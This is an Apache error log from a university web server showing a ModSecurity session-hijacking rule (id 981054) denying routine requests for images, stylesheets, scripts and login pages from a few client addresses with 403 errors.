[Mon Aug 28 07:45:10.996525 2023] [:error] [pid 37539] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOvuFsCo-f0AAJKjZyUAAAAG"]
[Mon Aug 28 07:45:11.007580 2023] [:error] [pid 38024] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvuF8Co-f0AAJSIdwQAAAAK"]
[Mon Aug 28 07:45:11.016696 2023] [:error] [pid 37918] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOvuF8Co-f0AAJQeRiAAAAAP"]
[Mon Aug 28 07:45:11.027727 2023] [:error] [pid 37916] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvuF8Co-f0AAJQcJ10AAAAF"]
[Mon Aug 28 07:45:11.067599 2023] [:error] [pid 38020] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvuF8Co-f0AAJSENZUAAAAH"]
[Mon Aug 28 07:45:11.076752 2023] [:error] [pid 37918] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvuF8Co-f0AAJQeRiEAAAAP"]
[Mon Aug 28 07:45:11.099790 2023] [:error] [pid 38024] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvuF8Co-f0AAJSIdwUAAAAK"]
[Mon Aug 28 07:45:11.120498 2023] [:error] [pid 37917] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOvuF8Co-f0AAJQdMTMAAAAJ"]
[Mon Aug 28 07:45:11.148630 2023] [:error] [pid 37916] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOvuF8Co-f0AAJQcJ14AAAAF"]
[Mon Aug 28 07:45:11.158690 2023] [:error] [pid 37803] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOvuF8Co-f0AAJOr9s0AAAAL"]
[Mon Aug 28 07:45:11.168711 2023] [:error] [pid 38020] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOvuF8Co-f0AAJSENZYAAAAH"]
[Mon Aug 28 07:45:11.178151 2023] [:error] [pid 37616] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvuF8Co-f0AAJLwYSYAAAAB"]
[Mon Aug 28 07:45:11.186961 2023] [:error] [pid 37539] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOvuF8Co-f0AAJKjZyYAAAAG"]
[Mon Aug 28 07:45:11.200632 2023] [:error] [pid 37918] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOvuF8Co-f0AAJQeRiIAAAAP"]
[Mon Aug 28 07:45:11.228505 2023] [:error] [pid 37917] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOvuF8Co-f0AAJQdMTQAAAAJ"]
[Mon Aug 28 07:45:11.248319 2023] [:error] [pid 38024] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOvuF8Co-f0AAJSIdwYAAAAK"]
[Mon Aug 28 07:45:11.256761 2023] [:error] [pid 38020] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvuF8Co-f0AAJSENZcAAAAH"]
[Mon Aug 28 07:45:11.256847 2023] [:error] [pid 37616] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOvuF8Co-f0AAJLwYScAAAAB"]
[Mon Aug 28 07:45:11.268034 2023] [:error] [pid 37916] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOvuF8Co-f0AAJQcJ18AAAAF"]
[Mon Aug 28 07:45:11.297210 2023] [:error] [pid 37917] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOvuF8Co-f0AAJQdMTUAAAAJ"]
[Mon Aug 28 07:45:11.307574 2023] [:error] [pid 38020] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOvuF8Co-f0AAJSENZgAAAAH"]
[Mon Aug 28 07:45:11.326864 2023] [:error] [pid 37616] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOvuF8Co-f0AAJLwYSgAAAAB"]
[Mon Aug 28 07:45:11.326944 2023] [:error] [pid 38024] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOvuF8Co-f0AAJSIdwcAAAAK"]
[Mon Aug 28 07:45:11.347657 2023] [:error] [pid 37916] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOvuF8Co-f0AAJQcJ2AAAAAF"]
[Mon Aug 28 07:45:11.546968 2023] [:error] [pid 37616] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvuF8Co-f0AAJLwYSkAAAAB"]
[Mon Aug 28 07:45:11.667889 2023] [:error] [pid 38020] [client 103.138.230.61] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuF8Co-f0AAJSENZkAAAAH"]
[Mon Aug 28 07:45:39.328518 2023] [:error] [pid 38061] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvuM8Co-f0AAJSt5TMAAAAR"]
[Mon Aug 28 07:45:39.621364 2023] [:error] [pid 38024] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuM8Co-f0AAJSIdw8AAAAK"]
[Mon Aug 28 07:45:54.609061 2023] [:error] [pid 38059] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvuQsCo-f0AAJSr2dUAAAAO"]
[Mon Aug 28 07:45:54.837515 2023] [:error] [pid 38024] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuQsCo-f0AAJSIdxEAAAAK"]
[Mon Aug 28 07:46:31.283254 2023] [:error] [pid 37616] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvuZ8Co-f0AAJLwYTgAAAAB"]
[Mon Aug 28 07:46:31.548650 2023] [:error] [pid 38021] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvuZ8Co-f0AAJSFI6oAAAAI"]
[Mon Aug 28 07:46:43.318912 2023] [:error] [pid 38064] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvuc8Co-f0AAJSw6ZUAAAAU"]
[Mon Aug 28 07:46:43.352239 2023] [:error] [pid 38023] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvuc8Co-f0AAJSHtcEAAAAD"]
[Mon Aug 28 07:46:43.358746 2023] [:error] [pid 38063] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvuc8Co-f0AAJSvom0AAAAT"]
[Mon Aug 28 07:46:43.390727 2023] [:error] [pid 38060] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvuc8Co-f0AAJSsrOUAAAAQ"]
[Mon Aug 28 07:46:43.499127 2023] [:error] [pid 38061] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvuc8Co-f0AAJSt5UAAAAAR"]
[Mon Aug 28 07:46:48.703164 2023] [:error] [pid 38059] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvueMCo-f0AAJSr2d0AAAAO"]
[Mon Aug 28 07:46:48.978759 2023] [:error] [pid 38062] [client 180.253.8.153] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvueMCo-f0AAJSuHrgAAAAS"]
[Mon Aug 28 07:46:58.878650 2023] [:error] [pid 38021] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvugsCo-f0AAJSFI7EAAAAI"]
[Mon Aug 28 07:46:58.979544 2023] [:error] [pid 38021] [client 114.122.104.34] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvugsCo-f0AAJSFI7IAAAAI"]
[Mon Aug 28 07:47:00.204044 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOvuhMCo-f0AAJSyp1UAAAAM"]
[Mon Aug 28 07:47:00.262005 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOvuhMCo-f0AAJSyp1YAAAAM"]
[Mon Aug 28 07:47:00.281287 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark.css"] [unique_id "ZOvuhMCo-f0AAJSyp1cAAAAM"]
[Mon Aug 28 07:47:00.291761 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/menu.css"] [unique_id "ZOvuhMCo-f0AAJSyp1gAAAAM"]
[Mon Aug 28 07:47:00.294409 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOvuhMCo-f0AAJS0EhwAAAAW"]
[Mon Aug 28 07:47:00.296623 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOvuhMCo-f0AAJS1nEYAAAAX"]
[Mon Aug 28 07:47:00.312215 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOvuhMCo-f0AAJS2FXQAAAAY"]
[Mon Aug 28 07:47:00.343084 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOvuhMCo-f0AAJS3EXwAAAAZ"]
[Mon Aug 28 07:47:00.351828 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOvuhMCo-f0AAJS0Eh0AAAAW"]
[Mon Aug 28 07:47:00.355065 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox-1.3.4.js"] [unique_id "ZOvuhMCo-f0AAJSyp1kAAAAM"]
[Mon Aug 28 07:47:00.363609 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.fancybox.settings.js"] [unique_id "ZOvuhMCo-f0AAJS2FXUAAAAY"]
[Mon Aug 28 07:47:00.393744 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/cufon-yui.js"] [unique_id "ZOvuhMCo-f0AAJS1nEcAAAAX"]
[Mon Aug 28 07:47:00.398398 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/ddsmoothmenu.js"] [unique_id "ZOvuhMCo-f0AAJS3EX0AAAAZ"]
[Mon Aug 28 07:47:00.409106 2023] [:error] [pid 38068] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.pack.js"] [unique_id "ZOvuhMCo-f0AAJS0Eh4AAAAW"]
[Mon Aug 28 07:47:00.411226 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.nivo.slider.settings.js"] [unique_id "ZOvuhMCo-f0AAJS2FXYAAAAY"]
[Mon Aug 28 07:47:00.442429 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/aslider.js"] [unique_id "ZOvuhMCo-f0AAJSyp1oAAAAM"]
[Mon Aug 28 07:47:00.442533 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/supersleight.plugin.js"] [unique_id "ZOvuhMCo-f0AAJS1nEgAAAAX"]
[Mon Aug 28 07:47:00.459386 2023] [:error] [pid 38070] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/styleswitch.js"] [unique_id "ZOvuhMCo-f0AAJS2FXcAAAAY"]
[Mon Aug 28 07:47:00.460407 2023] [:error] [pid 38071] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOvuhMCo-f0AAJS3EX4AAAAZ"]
[Mon Aug 28 07:47:00.477391 2023] [:error] [pid 38069] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext_plugins/statusbar/css/statusbar.css"] [unique_id "ZOvuhMCo-f0AAJS1nEkAAAAX"]
[Mon Aug 28 07:47:00.477759 2023] [:error] [pid 38066] [client 101.128.100.202] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/data-view.css"] [unique_id "ZOvuhMCo-f0AAJSyp1sAAAAM"]
